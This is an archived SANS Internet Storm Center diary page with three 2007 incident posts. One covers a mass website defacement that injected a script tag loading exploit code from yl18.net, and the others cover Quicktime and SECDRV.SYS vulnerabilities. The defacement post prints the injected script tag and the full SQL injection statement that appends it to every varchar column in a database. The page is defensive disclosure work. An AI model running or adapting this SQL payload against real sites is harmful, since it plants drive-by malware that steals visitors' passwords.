Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2007-11-06 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

yl18.net mass defacement

Published: 2007-11-06
Last Updated: 2007-11-07 09:03:51 UTC
by Maarten Van Horenbeeck (Version: 3)
3 comment(s)

Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet, covering around 150 domains which we so far know of.

script src="hXXp://yl 18.net/0.js"

This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.

Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:

AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 3.11.0.0 2007.10.19 -
F-Prot 4.4.2.54 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 9.0.0.4 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 6.2.9.117 2007.11.06 -
VBA32 3.12.2.4 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 

This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:

  • Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
  • If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
  • We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
  • If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.

We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.

As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.

This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.

These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.

If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.

UPDATE:  A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which was CAST away as HEX in a variable:

declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);

This code adds the malicious script tag to all user table objects which meet specific criteria (type varchar). It also explains why such a large number of pages per site have been affected.

--
Maarten Van Horenbeeck

Keywords:
3 comment(s)

Quicktime 7.3 patches serious security bugs

Published: 2007-11-06
Last Updated: 2007-11-06 19:20:59 UTC
by Maarten Van Horenbeeck (Version: 1)
5 comment(s)

Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:

  • A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
  • A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
  • Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
  • Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
  • A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
  • A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).

The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.

Keywords:
5 comment(s)

Windows XP and 2003 local privilege escalation vulnerability

Published: 2007-11-06
Last Updated: 2007-11-06 13:42:25 UTC
by Maarten Van Horenbeeck (Version: 2)
1 comment(s)

Microsoft has an advisory and a blog entry up on a new vulnerability, CVE-2007-5587, in the Macrovision SECDRV.SYS driver. This file is included with Windows XP and Windows Server 2003.

It appears partial information on the vulnerability and exploit code has been in the wild since mid October, and it is being exploited in a limited number of incidents.

This is a local attack which allows privilege escalation to Ring 0 . However, this means it can be abused by those who are able to introduce and execute code on the system. Depending on the situation this could go beyond shared user environments as it could be delivered to a system using a variety of other attack vectors (browser exploits, e-mails, file format exploits).

While plans for an official Microsoft supplied patch are in the works, Macrovision has released an update from their website which allows you to mitigate this issue.

--
Maarten Van Horenbeeck

Keywords:
1 comment(s)
Diary Archives